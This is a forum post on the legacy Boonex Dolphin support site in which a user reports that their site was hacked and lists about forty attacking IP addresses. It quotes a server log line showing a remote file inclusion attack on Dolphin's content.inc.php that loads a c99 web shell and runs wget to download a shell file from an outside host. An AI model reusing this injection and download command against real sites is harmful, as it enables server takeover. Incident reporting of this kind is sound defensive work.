sammie
strange because i checked a hack site too and the logs show the install of the viruses and Trojans and they all came from the following ip's some where logged on at the same time, 2-3-4-5 of them at the same time.

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute see more HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

125.160.130.62
125.161.175.176
125.161.242.63
125.162.0.113
125.162.100.238
125.162.119.8
125.162.120.4
125.162.120.71
125.162.123.243
125.162.245.116
125.162.250.166
125.162.255.114
125.162.255.151
125.162.255.25
125.162.40.85
125.162.41.197
125.162.44.29
125.162.81.235
125.162.88.121
125.163.211.4
125.163.222.124
125.163.250.47
125.163.79.69
125.163.81.129
125.163.85.158
125.164.129.76
125.164.205.204
125.164.213.29
125.164.238.186
125.164.238.40
125.164.78.44
125.164.78.68
125.164.94.102
125.165.106.115
125.165.4.201
125.165.6.130
125.165.62.30
125.167.242.86
125.167.254.125
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.041206836700439